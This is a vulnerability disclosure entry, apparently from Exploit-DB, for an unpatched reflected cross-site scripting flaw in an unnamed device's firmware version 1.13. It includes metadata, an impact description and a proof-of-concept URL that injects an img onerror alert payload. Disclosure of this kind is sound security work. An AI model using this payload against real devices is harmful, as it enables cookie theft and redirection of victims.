Unauthenticated

vendor:

N/A

by:

Usman Saeed

7.5

CVSS

HIGH

Cross-site Scripting (XSS)

CWE

Product Name: N/A

Affected Version From: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU

Affected Version To: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2018

The remote webserver does not filter special characters or illegal input, allowing a threat actor to execute a Cross-site scripting vector by sending a malicious URL to an innocent victim, which can be used to steal cookies or redirect the victim to a malicious website.

Mitigation:

Filter special characters and illegal input.

Source

Exploit-DB raw data:

[+] Unauthenticated

[+] Author: Usman Saeed (usman [at] xc0re.net)

[+] Affected Version: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU

[·] Impact: Client side attacks are very common and are the source of maximum number of user compromises. With this attack, the threat actor can steal cookies, redirect an innocent victim to a malicious website, thus compromising the user.

[·] Reason: The remote webserver does not filter special characters or illegal input.

[+] Attack type: Remote

[+] Patch Status: Unpatched

[+] Exploitation:

[!] The Cross-site scripting vector can be executed, as illustrated below

http://hostname/webpages/data/_._.<img src=a onerror=alert(“Reflected-XSS”)>../..%2f